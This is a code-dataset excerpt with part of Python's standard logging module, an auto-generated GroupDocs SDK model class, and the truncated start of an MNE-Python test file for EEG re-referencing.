perform arbitrary filtering of LogRecords. Loggers and Handlers can optionally use Filter instances to filter records as desired. The base filter class only allows events which are below a certain point in the logger hierarchy. For example, a filter initialized with "A.B" will allow events logged by loggers "A.B", "A.B.C", "A.B.C.D", "A.B.D" etc. but not "A.BB", "B.A.B" etc. If initialized with the empty string, all events are passed. """ def __init__(self, name=''): """ Initialize a filter. Initialize with the name of the logger which, together with its children, will have its events allowed through the filter. If no name is specified, allow every event. """ self.name = name self.nlen = len(name) def filter(self, record): """ Determine if the specified record is to be logged. Is the specified record to be logged? Returns 0 for no, nonzero for yes. If deemed appropriate, the record may be modified in-place. """ if self.nlen == 0: return True elif self.name == record.name: return True elif record.name.find(self.name, 0, self.nlen) != 0: return False return (record.name[self.nlen] == ".") class Filterer(object): """ A base class for loggers and handlers which allows them to share common code. """ def __init__(self): """ Initialize the list of filters to be an empty list. """ self.filters = [] def addFilter(self, filter): """ Add the specified filter to this handler. """ if not (filter in self.filters): self.filters.append(filter) def removeFilter(self, filter): """ Remove the specified filter from this handler. """ if filter in self.filters: self.filters.remove(filter) def filter(self, record): """ Determine if a record is loggable by consulting all the filters. The default is to allow the record to be logged; any filter can veto this and the record is then dropped. Returns a zero value if a record is to be dropped, else non-zero. .. versionchanged: 3.2 Allow filters to be just callables. """ rv = True for f in self.filters: if hasattr(f, 'filter'): result = f.filter(record) else: result = f(record) # assume callable - will raise if not if not result: rv = False break return rv #--------------------------------------------------------------------------- # Handler classes and functions #--------------------------------------------------------------------------- _handlers = weakref.WeakValueDictionary() #map of handler names to handlers _handlerList = [] # added to allow handlers to be removed in reverse of order initialized def _removeHandlerRef(wr): """ Remove a handler reference from the internal cleanup list. """ # This function can be called during module teardown, when globals are # set to None. If _acquireLock is None, assume this is the case and do # nothing. if (_acquireLock is not None and _handlerList is not None and _releaseLock is not None): _acquireLock() try: if wr in _handlerList: _handlerList.remove(wr) finally: _releaseLock() def _addHandlerRef(handler): """ Add a handler to the internal cleanup list using a weak reference. """ _acquireLock() try: _handlerList.append(weakref.ref(handler, _removeHandlerRef)) finally: _releaseLock() class Handler(Filterer): """ Handler instances dispatch logging events to specific destinations. The base handler class. Acts as a placeholder which defines the Handler interface. Handlers can optionally use Formatter instances to format records as desired. By default, no formatter is specified; in this case, the 'raw' message as determined by record.message is logged. """ def __init__(self, level=NOTSET): """ Initializes the instance - basically setting the formatter to None and the filter list to empty. """ Filterer.__init__(self) self._name = None self.level = _checkLevel(level) self.formatter = None # Add the handler to the global _handlerList (for cleanup on shutdown) _addHandlerRef(self) self.createLock() def get_name(self): return self._name def set_name(self, name): _acquireLock() try: if self._name in _handlers: del _handlers[self._name] self._name = name if name: _handlers[name] = self finally: _releaseLock() name = property(get_name, set_name) def createLock(self): """ Acquire a thread lock for serializing access to the underlying I/O. """ if threading: self.lock = threading.RLock() else: #pragma: no cover self.lock = None def acquire(self): """ Acquire the I/O thread lock. """ if self.lock: self.lock.acquire() def release(self): """ Release the I/O thread lock. """ if self.lock: self.lock.release() def setLevel(self, level): """ Set the logging level of this handler. level must be an int or a str. """ self.level = _checkLevel(level) def format(self, record): """ Format the specified record. If a formatter is set, use it. Otherwise, use the default formatter for the module. """ if self.formatter: fmt = self.formatter else: fmt = _defaultFormatter return fmt.format(record) def emit(self, record): """ Do whatever it takes to actually log the specified logging record. This version is intended to be implemented by subclasses and so raises a NotImplementedError. """ raise NotImplementedError('emit must be implemented ' 'by Handler subclasses') def handle(self, record): """ Conditionally emit the specified logging record. Emission depends on filters which may have been added to the handler. Wrap the actual emission of the record with acquisition/release of the I/O thread lock. Returns whether the filter passed the record for emission. """ rv = self.filter(record) if rv: self.acquire() try: self.emit(record) finally: self.release() return rv def setFormatter(self, fmt): """ Set the formatter for this handler. """ self.formatter = fmt def flush(self): """ Ensure all logging output has been flushed. This version does nothing and is intended to be implemented by subclasses. """ pass def close(self): """ Tidy up any resources used by the handler. This version removes the handler from an internal map of handlers, _handlers, which is used for handler lookup by name. Subclasses should ensure that this gets called from overridden close() methods. """ #get the module data lock, as we're updating a shared structure. _acquireLock() try: #unlikely to raise an exception, but you never know... if self._name and self._name in _handlers: del _handlers[self._name] finally: _releaseLock() def handleError(self, record): """ Handle errors which occur during an emit() call. This method should be called from handlers when an exception is encountered during an emit() call. If raiseExceptions is false, exceptions get silently ignored. This is what is mostly wanted for a logging system - most users will not care about errors in the logging system, they are more interested in application errors. You could, however, replace this with a custom handler if you wish. The record which was being processed is passed in to this method. """ if raiseExceptions and sys.stderr: # see issue 13807 ei = sys.exc_info() try: traceback.print_exception(ei[0], ei[1], ei[2], None, sys.stderr) sys.stderr.write('Logged from file %s, line %s\n' % ( record.filename, record.lineno)) except IOError: #pragma: no cover pass # see issue 5971 finally: del ei class StreamHandler(Handler): """ A handler class which writes logging records, appropriately formatted, to a stream. Note that this class does not close the stream, as sys.stdout or sys.stderr may be used. """ terminator = '\n' def __init__(self, stream=None): """ Initialize the handler. If stream is not specified, sys.stderr is used. """ Handler.__init__(self) if stream is None: stream = sys.stderr self.stream = stream def flush(self): """ Flushes the stream. """ self.acquire() try: if self.stream and hasattr(self.stream, "flush"): self.stream.flush() finally: self.release() def emit(self, record): """ Emit a record. If a formatter is specified, it is used to format the record. The record is then written to the stream with a trailing newline. If exception information is present, it is formatted using traceback.print_exception and appended to the stream. If the stream has an 'encoding' attribute, it is used to determine how to do the output to the stream. """ try: msg = self.format(record) stream = self.stream stream.write(msg) stream.write(self.terminator) self.flush() except (KeyboardInterrupt, SystemExit): #pragma: no cover raise except: self.handleError(record) class FileHandler(StreamHandler): """ A handler class which writes formatted logging records to disk files. """ def __init__(self, filename, mode='a', encoding=None, delay=False): """ Open the specified file and use it as the stream for logging. """ #keep the absolute path, otherwise derived classes which use this #may come a cropper when the current directory changes self.baseFilename = os.path.abspath(filename) self.mode = mode self.encoding = encoding self.delay = delay if delay: #We don't open the stream, but we still need to call the #Handler constructor to set level, formatter, lock etc. Handler.__init__(self) self.stream = None else: StreamHandler.__init__(self, self._open()) def close(self): """ Closes the stream. """ self.acquire() try: if self.stream: self.flush() if hasattr(self.stream, "close"): self.stream.close() StreamHandler.close(self) self.stream = None finally: self.release() def _open(self): """ Open the current base file with the (original) mode and encoding. Return the resulting stream. """ return open(self.baseFilename, self.mode, encoding=self.encoding) def emit(self, record): """ Emit a record. If the stream was not opened because 'delay' was specified in the constructor, open it before calling the superclass's emit. """ if self.stream is None: self.stream = self._open() StreamHandler.emit(self, record) class _StderrHandler(StreamHandler): """ This class is like a StreamHandler using sys.stderr, but always uses whatever sys.stderr is currently set to rather than the value of sys.stderr at handler construction time. """ def __init__(self, level=NOTSET): """ Initialize the handler. """ Handler.__init__(self, level) @property def stream(self): return sys.stderr _defaultLastResort = _StderrHandler(WARNING) lastResort = _defaultLastResort #--------------------------------------------------------------------------- # Manager classes and functions #--------------------------------------------------------------------------- class PlaceHolder(object): """ PlaceHolder instances are used in the Manager logger hierarchy to take the place of nodes for which no loggers have been defined. This class is intended for internal use only and not as part of the public API. """ def __init__(self, alogger): """ Initialize with the specified logger being a child of this placeholder. """ self.loggerMap = { alogger : None } def append(self, alogger): """ Add the specified logger as a child of this placeholder. """ if alogger not in self.loggerMap: self.loggerMap[alogger] = None # # Determine which class to use when instantiating loggers. # _loggerClass = None def setLoggerClass(klass): """ Set the class to be used when instantiating a logger. The class should define __init__() such that only a name argument is required, and the __init__() should call Logger.__init__() """ if klass != Logger: if not issubclass(klass, Logger): raise TypeError("logger not derived from logging.Logger: " + klass.__name__) global _loggerClass _loggerClass = klass def getLoggerClass(): """ Return the class to be used when instantiating a logger. """ return _loggerClass class Manager(object): """ There is [under normal circumstances] just one Manager instance, which holds the hierarchy of loggers. """ def __init__(self, rootnode): """ Initialize the manager with the root node of the logger hierarchy. """ self.root = rootnode self.disable = 0 self.emittedNoHandlerWarning = False self.loggerDict = {} self.loggerClass = None self.logRecordFactory = None def getLogger(self, name): """ Get a logger with the specified name (channel name), creating it if it doesn't yet exist. This name is a dot-separated hierarchical name, such as "a", "a.b", "a.b.c" or similar. If a PlaceHolder existed for the specified name [i.e. the logger didn't exist but a child of it did], replace it with the created logger and fix up the parent/child references which pointed to the placeholder to now point to the logger. """ rv = None if not isinstance(name, str): raise TypeError('A logger name must be a string') _acquireLock() try: if name in self.loggerDict: rv = self.loggerDict[name] if isinstance(rv, PlaceHolder): ph = rv rv = (self.loggerClass or _loggerClass)(name) rv.manager = self self.loggerDict[name] = rv self._fixupChildren(ph, rv) self._fixupParents(rv) else: rv = (self.loggerClass or _loggerClass)(name) rv.manager = self self.loggerDict[name] = rv self._fixupParents(rv) finally: _releaseLock() return rv def setLoggerClass(self, klass): """ Set the class to be used when instantiating a logger with this Manager. """ if klass != Logger: if not issubclass(klass, Logger): raise TypeError("logger not derived from logging.Logger: " + klass.__name__) self.loggerClass = klass def setLogRecordFactory(self, factory): """ Set the factory to be used when instantiating a log record with this Manager. """ self.logRecordFactory = factory def _fixupParents(self, alogger): """ Ensure that there are either loggers or placeholders all the way from the specified logger to the root of the logger hierarchy. """ name = alogger.name i = name.rfind(".") rv = None while (i > 0) and not rv: substr = name[:i] if substr not in self.loggerDict: self.loggerDict[substr] = PlaceHolder(alogger) else: obj = self.loggerDict[substr] if isinstance(obj, Logger): rv = obj else: assert isinstance(obj, PlaceHolder) obj.append(alogger) i = name.rfind(".", 0, i - 1) if not rv: rv = self.root alogger.parent = rv def _fixupChildren(self, ph, alogger): """ Ensure that children of the placeholder ph are connected to the specified logger. """ name = alogger.name namelen = len(name) for c in ph.loggerMap.keys(): #The if means ... if not c.parent.name.startswith(nm) if c.parent.name[:namelen] != name: alogger.parent = c.parent c.parent = alogger #--------------------------------------------------------------------------- # Logger classes and functions #--------------------------------------------------------------------------- class Logger(Filterer): """ Instances of the Logger class represent a single logging channel. A "logging channel" indicates an area of an application. Exactly how an "area" is defined is up to the application developer. Since an application can have any number of areas, logging channels are identified by a unique string. Application areas can be nested (e.g. an area of "input processing" might include sub-areas "read CSV files", "read XLS files" and "read Gnumeric files"). To cater for this natural nesting, channel names are organized into a namespace hierarchy where levels are separated by periods, much like the Java or Python package namespace. So in the instance given above, channel names might be "input" for the upper level, and "input.csv", "input.xls" and "input.gnu" for the sub-levels. There is no arbitrary limit to the depth of nesting. """ def __init__(self, name, level=NOTSET): """ Initialize the logger with a name and an optional level. """ Filterer.__init__(self) self.name = name self.level = _checkLevel(level) self.parent = None self.propagate = True self.handlers = [] self.disabled = False def setLevel(self, level): """ Set the logging level of this logger. level must be an int or a str. """ self.level = _checkLevel(level) def debug(self, msg, *args, **kwargs): """ Log 'msg % args' with severity 'DEBUG'. To pass exception information, use the keyword argument exc_info with a true value, e.g. logger.debug("Houston, we have a %s", "thorny problem", exc_info=1) """ if self.isEnabledFor(DEBUG): self._log(DEBUG, msg, args, **kwargs) def info(self, msg, *args, **kwargs): """ Log 'msg % args' with severity 'INFO'. To pass exception information, use the keyword argument exc_info with a true value, e.g. logger.info("Houston, we have a %s", "interesting problem", exc_info=1) """ if self.isEnabledFor(INFO): self._log(INFO, msg, args, **kwargs) def warning(self, msg, *args, **kwargs): """ Log 'msg % args' with severity 'WARNING'. To pass exception information, use the keyword argument exc_info with a true value, e.g. logger.warning("Houston, we have a %s", "bit of a problem", exc_info=1) """ if self.isEnabledFor(WARNING): self._log(WARNING, msg, args, **kwargs) def warn(self, msg, *args, **kwargs): warnings.warn("The 'warn' method is deprecated, " "use 'warning' instead", DeprecationWarning, 2) self.warning(msg, *args, **kwargs) def error(self, msg, *args, **kwargs): """ Log 'msg % args' with severity 'ERROR'. To pass exception information, use the keyword argument exc_info with a true value, e.g. logger.error("Houston, we have a %s", "major problem", exc_info=1) """ if self.isEnabledFor(ERROR): self._log(ERROR, msg, args, **kwargs) def exception(self, msg, *args, **kwargs): """ Convenience method for logging an ERROR with exception information. """ kwargs['exc_info'] = True self.error(msg, *args, **kwargs) def critical(self, msg, *args, **kwargs): """ Log 'msg % args' with severity 'CRITICAL'. To pass exception information, use the keyword argument exc_info with a true value, e.g. logger.critical("Houston, we have a %s", "major disaster", exc_info=1) """ if self.isEnabledFor(CRITICAL): self._log(CRITICAL, msg, args, **kwargs) fatal = critical def log(self, level, msg, *args, **kwargs): """ Log 'msg % args' with the integer severity 'level'. To pass exception information, use the keyword argument exc_info with a true value, e.g. logger.log(level, "We have a %s", "mysterious problem", exc_info=1) """ if not isinstance(level, int): if raiseExceptions: raise TypeError("level must be an integer") else: return if self.isEnabledFor(level): self._log(level, msg, args, **kwargs) def findCaller(self, stack_info=False): """ Find the stack frame of the caller so that we can note the source file name, line number and function name. """ f = currentframe() #On some versions of IronPython, currentframe() returns None if #IronPython isn't run with -X:Frames. if f is not None: f = f.f_back rv = "(unknown file)", 0, "(unknown function)", None while hasattr(f, "f_code"): co = f.f_code filename = os.path.normcase(co.co_filename) if filename == _srcfile: f = f.f_back continue sinfo = None if stack_info: sio = io.StringIO() sio.write('Stack (most recent call last):\n') traceback.print_stack(f, file=sio) sinfo = sio.getvalue() if sinfo[-1] == '\n': sinfo = sinfo[:-1] sio.close() rv = (co.co_filename, f.f_lineno, co.co_name, sinfo) break return rv def makeRecord(self, name, level, fn, lno, msg, args, exc_info, func=None, extra=None, sinfo=None): """ A factory method which can be overridden in subclasses to create specialized LogRecords. """ rv = _logRecordFactory(name, level, fn, lno, msg, args, exc_info, func, sinfo) if extra is not None: for key in extra: if (key in ["message", "asctime"]) or (key in rv.__dict__): raise KeyError("Attempt to overwrite %r in LogRecord" % key) rv.__dict__[key] = extra[key] return rv def _log(self, level, msg, args, exc_info=None, extra=None, stack_info=False): """ Low-level logging routine which creates a LogRecord and then calls all the handlers of this logger to handle the record. """ sinfo = None if _srcfile: #IronPython doesn't track Python frames, so findCaller raises an #exception on some versions of IronPython. We trap it here so that #IronPython can use logging. try: fn, lno, func, sinfo = self.findCaller(stack_info) except ValueError: # pragma: no cover fn, lno, func = "(unknown file)", 0, "(unknown function)" else: # pragma: no cover fn, lno, func = "(unknown file)", 0, "(unknown function)" if exc_info: if not isinstance(exc_info, tuple): exc_info = sys.exc_info() record = self.makeRecord(self.name, level, fn, lno, msg, args, exc_info, func, extra, sinfo) self.handle(record) def handle(self, record): """ Call the handlers for the specified record. This method is used for unpickled records received from a socket, as well as those created locally. Logger-level filtering is applied. """ if (not self.disabled) and self.filter(record): self.callHandlers(record) def addHandler(self, hdlr): """ Add the specified handler to this logger. """ _acquireLock() try: if not (hdlr in self.handlers): self.handlers.append(hdlr) finally: _releaseLock() def removeHandler(self, hdlr): """ Remove the specified handler from this logger. """ _acquireLock() try: if hdlr in self.handlers: self.handlers.remove(hdlr) finally: _releaseLock() def hasHandlers(self): """ See if this logger has any handlers configured. Loop through all handlers for this logger and its parents in the logger hierarchy. Return True if a handler was found, else False. Stop searching up the hierarchy whenever a logger with the "propagate" attribute set to zero is found - that will be the last logger which is checked for the existence of handlers. """ c = self rv = False while c: if c.handlers: rv = True break if not c.propagate: break else: c = c.parent return rv def callHandlers(self, record): """ Pass a record to all relevant handlers. Loop through all handlers for this logger and its parents in the logger hierarchy. If no handler was found, output a one-off error message to sys.stderr. Stop searching up the hierarchy whenever a logger with the "propagate" attribute set to zero is found - that will be the last logger whose handlers are called. """ c = self found = 0 while c: for hdlr in c.handlers: found = found + 1 if record.levelno >= hdlr.level: hdlr.handle(record) if not c.propagate: c = None #break out else: c = c.parent if (found == 0): if lastResort: if record.levelno >= lastResort.level: lastResort.handle(record) elif raiseExceptions and not self.manager.emittedNoHandlerWarning: sys.stderr.write("No handlers could be found for logger" " \"%s\"\n" % self.name) self.manager.emittedNoHandlerWarning = True def getEffectiveLevel(self): """ Get the effective level for this logger. Loop through this logger and its parents in the logger hierarchy, looking for a non-zero logging level. Return the first one found. """ logger = self while logger: if logger.level: return logger.level logger = logger.parent return NOTSET def isEnabledFor(self, level): """ Is this logger enabled for level 'level'? """ if self.manager.disable >= level: return False return level >= self.getEffectiveLevel() def getChild(self, suffix): """ Get a logger which is a descendant to this one. This is a convenience method, such that logging.getLogger('abc').getChild('def.ghi') is the same as logging.getLogger('abc.def.ghi') It's useful, for example, when the parent logger is named using __name__ rather than a literal string. """ if self.root is not self: suffix = '.'.join((self.name, suffix)) return self.manager.getLogger(suffix) class RootLogger(Logger): """ A root logger is not that different to any other logger, except that it must have a logging level and there is only one instance of it in the hierarchy. """ def __init__(self, level): """ Initialize the logger with the name "root". """ Logger.__init__(self, "root", level) _loggerClass = Logger class LoggerAdapter(object): """ An adapter for loggers which makes it easier to specify contextual information in logging output. """ def __init__(self, logger, extra): """ Initialize the adapter with a logger and a dict-like object which provides contextual information. This constructor signature allows easy stacking of LoggerAdapters, if so desired. You can effectively pass keyword arguments as shown in the following example: adapter = LoggerAdapter(someLogger, dict(p1=v1, p2="v2")) """ self.logger = logger self.extra = extra def process(self, msg, kwargs): """ Process the logging message and keyword arguments passed in to a logging call to insert contextual information. You can either manipulate the message itself, the keyword args or both. Return the message and kwargs modified (or not) to suit your needs. Normally, you'll only need to override this one method in a LoggerAdapter subclass for your specific needs. """ kwargs["extra"] = self.extra return msg, kwargs # # Boilerplate convenience methods # def debug(self, msg, *args, **kwargs): """ Delegate a debug call to the underlying logger. """ self.log(DEBUG, msg, *args, **kwargs) def info(self, msg, *args, **kwargs): """ Delegate an info call to the underlying logger. """ self.log(INFO, msg, *args, **kwargs) def warning(self, msg, *args, **kwargs): """ Delegate a warning call to the underlying logger. """ self.log(WARNING, msg, *args, **kwargs) def warn(self, msg, *args, **kwargs): warnings.warn("The 'warn' method is deprecated, " "use 'warning' instead", DeprecationWarning, 2) self.warning(msg, *args, **kwargs) def error(self, msg, *args, **kwargs): """ Delegate an error call to the underlying logger. """ self.log(ERROR, msg, *args, **kwargs) def exception(self, msg, *args, **kwargs): """ Delegate an exception call to the underlying logger. """ kwargs["exc_info"] = True self.log(ERROR, msg, *args, **kwargs) def critical(self, msg, *args, **kwargs): """ Delegate a critical call to the underlying logger. """ self.log(CRITICAL, msg, *args, **kwargs) def log(self, level, msg, *args, **kwargs): """ Delegate a log call to the underlying logger, after adding contextual information from this adapter instance. """ if self.isEnabledFor(level): msg, kwargs = self.process(msg, kwargs) self.logger._log(level, msg, args, **kwargs) def isEnabledFor(self, level): """ Is this logger enabled for level 'level'? """ if self.logger.manager.disable >= level: return False return level >= self.getEffectiveLevel() def setLevel(self, level): """ Set the specified level on the underlying logger. """ self.logger.setLevel(level) def getEffectiveLevel(self): """ Get the effective level for the underlying logger. """ return self.logger.getEffectiveLevel() def hasHandlers(self): """ See if the underlying logger has any handlers. """ return self.logger.hasHandlers() root = RootLogger(WARNING) Logger.root = root Logger.manager = Manager(Logger.root) #--------------------------------------------------------------------------- # Configuration classes and functions #--------------------------------------------------------------------------- BASIC_FORMAT = "%(levelname)s:%(name)s:%(message)s" def basicConfig(**kwargs): """ Do basic configuration for the logging system. This function does nothing if the root logger already has handlers configured. It is a convenience method intended for use by simple scripts to do one-shot configuration of the logging package. The default behaviour is to create a StreamHandler which writes to sys.stderr, set a formatter using the BASIC_FORMAT format string, and add the handler to the root logger. A number of optional keyword arguments may be specified, which can alter the default behaviour. filename Specifies that a FileHandler be created, using the specified filename, rather than a StreamHandler. filemode Specifies the mode to open the file, if filename is specified (if filemode is unspecified, it defaults to 'a'). format Use the specified format string for the handler. datefmt Use the specified date/time format. style If a format string is specified, use this to specify the type of format string (possible values '%', '{', '$', for %-formatting, :meth:`str.format` and :class:`string.Template` - defaults to '%'). level Set the root logger level to the specified level. stream Use the specified stream to initialize the StreamHandler. Note that this argument is incompatible with 'filename' - if both are present, 'stream' is ignored. handlers If specified, this should be an iterable of already created handlers, which will be added to the root handler. Any handler in the list which does not have a formatter assigned will be assigned the formatter created in this function. Note that you could specify a stream created using open(filename, mode) rather than passing the filename and mode in. However, it should be remembered that StreamHandler does not close its stream (since it may be using sys.stdout or sys.stderr), whereas FileHandler closes its stream when the handler is closed. .. versionchanged:: 3.2 Added the ``style`` parameter. .. versionchanged:: 3.3 Added the ``handlers`` parameter. A ``ValueError`` is now thrown for incompatible arguments (e.g. ``handlers`` specified together with ``filename``/``filemode``, or ``filename``/``filemode`` specified together with ``stream``, or ``handlers`` specified together with ``stream``. """ # Add thread safety in case someone mistakenly calls # basicConfig() from multiple threads _acquireLock() try: if len(root.handlers) == 0: handlers = kwargs.get("handlers") if handlers is None: if "stream" in kwargs and "filename" in kwargs: raise ValueError("'stream' and 'filename' should not be " "specified together") else: if "stream" in kwargs or "filename" in kwargs: raise ValueError("'stream' or 'filename' should not be " "specified together with 'handlers'") if handlers is None: filename = kwargs.get("filename") if filename: mode = kwargs.get("filemode", 'a') h = FileHandler(filename, mode) else: stream = kwargs.get("stream") h = StreamHandler(stream) handlers = [h] fs = kwargs.get("format", BASIC_FORMAT) dfs = kwargs.get("datefmt", None) style = kwargs.get("style", '%') fmt = Formatter(fs, dfs, style) for h in handlers: if h.formatter is None: h.setFormatter(fmt) root.addHandler(h) level = kwargs.get("level") if level is not None: root.setLevel(level) finally: _releaseLock() #--------------------------------------------------------------------------- # Utility functions at module level. # Basically delegate everything to the root logger. #--------------------------------------------------------------------------- def getLogger(name=None): """ Return a logger with the specified name, creating it if necessary. If no name is specified, return the root logger. """ if name: return Logger.manager.getLogger(name) else: return root def critical(msg, *args, **kwargs): """ Log a message with severity 'CRITICAL' on the root logger. If the logger has no handlers, call basicConfig() to add a console handler with a pre-defined format. """ if len(root.handlers) == 0: basicConfig() root.critical(msg, *args, **kwargs) fatal = critical def error(msg, *args, **kwargs): """ Log a message with severity 'ERROR' on the root logger. If the logger has no handlers, call basicConfig() to add a console handler with a pre-defined format. """ if len(root.handlers) == 0: basicConfig() root.error(msg, *args, **kwargs) def exception(msg, *args, **kwargs): """ Log a message with severity 'ERROR' on the root logger, with exception information. If the logger has no handlers, basicConfig() is called to add a console handler with a pre-defined format. """ kwargs['exc_info'] = True error(msg, *args, **kwargs) def warning(msg, *args, **kwargs): """ Log a message with severity 'WARNING' on the root logger. If the logger has no handlers, call basicConfig() to add a console handler with a pre-defined format. """ if len(root.handlers) == 0: basicConfig() root.warning(msg, *args, **kwargs) def warn(msg, *args, **kwargs): warnings.warn("The 'warn' function is deprecated, " "use 'warning' instead", DeprecationWarning, 2) warning(msg, *args, **kwargs) def info(msg, *args, **kwargs): """ Log a message with severity 'INFO' on the root logger. If the logger has no handlers, call basicConfig() to add a console handler with a pre-defined format. """ if len(root.handlers) == 0: basicConfig() root.info(msg, *args, **kwargs) def debug(msg, *args, **kwargs): """ Log a message with severity 'DEBUG' on the root logger. If the logger has no handlers, call basicConfig() to add a console handler with a pre-defined format. """ if len(root.handlers) == 0: basicConfig() root.debug(msg, *args, **kwargs) def log(level, msg, *args, **kwargs): """ Log 'msg % args' with the integer severity 'level' on the root logger. If the logger has no handlers, call basicConfig() to add a console handler with a pre-defined format. """ if len(root.handlers) == 0: basicConfig() root.log(level, msg, *args, **kwargs) def disable(level): """ Disable all logging calls of severity 'level' and below. """ root.manager.disable = level def shutdown(handlerList=_handlerList): """ Perform any cleanup actions in the logging system (e.g. flushing buffers). Should be called at application exit. """ for wr in reversed(handlerList[:]): #errors might occur, for example, if files are locked #we just ignore them if raiseExceptions is not set try: h = wr() if h: try: h.acquire() h.flush() h.close() except (IOError, ValueError): # Ignore errors which might be caused # because handlers have been closed but # references to them are still around at # application exit. pass finally: h.release() except: if raiseExceptions: raise #else, swallow #Let's try and shutdown automatically on application exit... import atexit atexit.register(shutdown) # Null handler class NullHandler(Handler): """ This handler does nothing. It's intended to be used to avoid the "No handlers could be found for logger XXX" one-off warning. This is important for library code, which may contain code to log events. If a user of the library does not configure logging, the one-off warning might be produced; to avoid this, the library developer simply needs to instantiate a NullHandler and add it to the top-level logger of the library module or package. """ def handle(self, record): """Stub.""" def emit(self, record): """Stub.""" def createLock(self): self.lock = None # Warnings integration _warnings_showwarning = None def _showwarning(message, category, filename, lineno, file=None, line=None): """ Implementation of showwarnings which redirects to logging, which will first check to see if the file parameter is None. If a file is specified, it will delegate to the original warnings implementation of showwarning. Otherwise, it will call warnings.formatwarning and will log the resulting string to a warnings logger named "py.warnings" with level logging.WARNING. """ if file is not None: if _warnings_showwarning is not None: _warnings_showwarning(message, category, filename, lineno, file, line) else: s = warnings.formatwarning(message, category, filename, lineno, line) logger = getLogger("py.warnings") if not logger.handlers: logger.addHandler(NullHandler()) logger.warning("%s", s) def captureWarnings(capture): """ If capture is true, redirect all warnings to the logging package. If capture is False, ensure that warnings are not redirected to logging but to their original destinations. """ global _warnings_showwarning if capture: if _warnings_showwarning is None: _warnings_showwarning = warnings.showwarning warnings.showwarning = _showwarning else: if _warnings_showwarning is not None: warnings.showwarning = _warnings_showwarning _warnings_showwarning = None
gpl-3.0
liosha2007/temporary-groupdocs-python-sdk
groupdocs/models/SignatureEnvelopeFieldLocationSettings.py
2
1794
#!/usr/bin/env python """ Copyright 2012 GroupDocs. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ class SignatureEnvelopeFieldLocationSettings: """ NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually.""" def __init__(self): self.swaggerTypes = { 'page': 'int', 'locationX': 'float', 'locationY': 'float', 'locationWidth': 'float', 'locationHeight': 'float', 'fontName': 'str', 'fontColor': 'str', 'fontSize': 'float', 'fontBold': 'bool', 'fontItalic': 'bool', 'fontUnderline': 'bool', 'forceNewField': 'bool', 'align': 'int' } self.page = None # int self.locationX = None # float self.locationY = None # float self.locationWidth = None # float self.locationHeight = None # float self.fontName = None # str self.fontColor = None # str self.fontSize = None # float self.fontBold = None # bool self.fontItalic = None # bool self.fontUnderline = None # bool self.forceNewField = None # bool self.align = None # int
apache-2.0
matthew-tucker/mne-python
mne/io/tests/test_reference.py
10
13045
# Authors: Marijn van Vliet <[email protected]> # Alexandre Gramfort <[email protected]> # Teon Brooks <[email protected]> # # License: BSD (3-clause) import warnings import os.path as op import numpy as np from nose.tools import assert_true, assert_equal, assert_raises from numpy.testing import assert_array_equal, assert_allclose from mne import pick_types, Evoked, Epochs, read_events from mne.io.constants import FIFF from mne.io import (set_eeg_reference, set_bipolar_reference, add_reference_channels) from mne.io.proj import _has_eeg_average_ref_proj from mne.io.reference import _apply_reference from mne.datasets import testing from mne.io import Raw warnings.simplefilter('always') # enable b/c these tests throw warnings data_dir = op.join(testing.data_path(download=False), 'MEG', 'sample') fif_fname = op.join(data_dir, 'sample_audvis_trunc_raw.fif') eve_fname = op.join(data_dir, 'sample_audvis_trunc_raw-eve.fif') ave_fname = op.join(data_dir, 'sample_audvis_trunc-ave.fif') def _test_reference(raw, reref, ref_data, ref_from): """Helper function to test whether a reference has been correctly applied.""" # Separate EEG channels from other channel types picks_eeg = pick_types(raw.info, meg=False, eeg=True, exclude='bads') picks_other = pick_types(raw.info, meg=True, eeg=False, eog=True, stim=True, exclude='bads') # Calculate indices of reference channesl picks_ref = [raw.ch_names.index(ch) for ch in ref_from] # Get data if isinstance(raw, Evoked): _data = raw.data _reref = reref.data else: _data = raw._data _reref = reref._data # Check that the ref has been properly computed assert_array_equal(ref_data, _data[..., picks_ref, :].mean(-2)) # Get the raw EEG data and other channel data raw_eeg_data = _data[..., picks_eeg, :] raw_other_data = _data[..., picks_other, :] # Get the rereferenced EEG data reref_eeg_data = _reref[..., picks_eeg, :] reref_other_data = _reref[..., picks_other, :] # Undo rereferencing of EEG channels if isinstance(raw, Epochs): unref_eeg_data = reref_eeg_data + ref_data[:, np.newaxis, :] else: unref_eeg_data = reref_eeg_data + ref_data # Check that both EEG data and other data is the same assert_allclose(raw_eeg_data, unref_eeg_data, 1e-6, atol=1e-15) assert_allclose(raw_other_data, reref_other_data, 1e-6, atol=1e-15) @testing.requires_testing_data def test_apply_reference(): """Test base function for rereferencing""" raw = Raw(fif_fname, preload=True) # Rereference raw data by creating a copy of original data reref, ref_data = _apply_reference(raw, ref_from=['EEG 001', 'EEG 002'], copy=True) assert_true(reref.info['custom_ref_applied']) _test_reference(raw, reref, ref_data, ['EEG 001', 'EEG 002']) # The CAR reference projection should have been removed by the function assert_true(not _has_eeg_average_ref_proj(reref.info['projs'])) # Test that disabling the reference does not break anything reref, ref_data = _apply_reference(raw, []) assert_array_equal(raw._data, reref._data) # Test that data is modified in place when copy=False reref, ref_data = _apply_reference(raw, ['EEG 001', 'EEG 002'], copy=False) assert_true(raw is reref) # Test re-referencing Epochs object raw = Raw(fif_fname, preload=False, add_eeg_ref=False) events = read_events(eve_fname) picks_eeg = pick_types(raw.info, meg=False, eeg=True) epochs = Epochs(raw, events=events, event_id=1, tmin=-0.2, tmax=0.5, picks=picks_eeg, preload=True) reref, ref_data = _apply_reference(epochs, ref_from=['EEG 001', 'EEG 002'], copy=True) assert_true(reref.info['custom_ref_applied']) _test_reference(epochs, reref, ref_data, ['EEG 001', 'EEG 002']) # Test re-referencing Evoked object evoked = epochs.average() reref, ref_data = _apply_reference(evoked, ref_from=['EEG 001', 'EEG 002'], copy=True) assert_true(reref.info['custom_ref_applied']) _test_reference(evoked, reref, ref_data, ['EEG 001', 'EEG 002']) # Test invalid input raw_np = Raw(fif_fname, preload=False) assert_raises(RuntimeError, _apply_reference, raw_np, ['EEG 001']) @testing.requires_testing_data def test_set_eeg_reference(): """Test rereference eeg data""" raw = Raw(fif_fname, preload=True) raw.info['projs'] = [] # Test setting an average reference assert_true(not 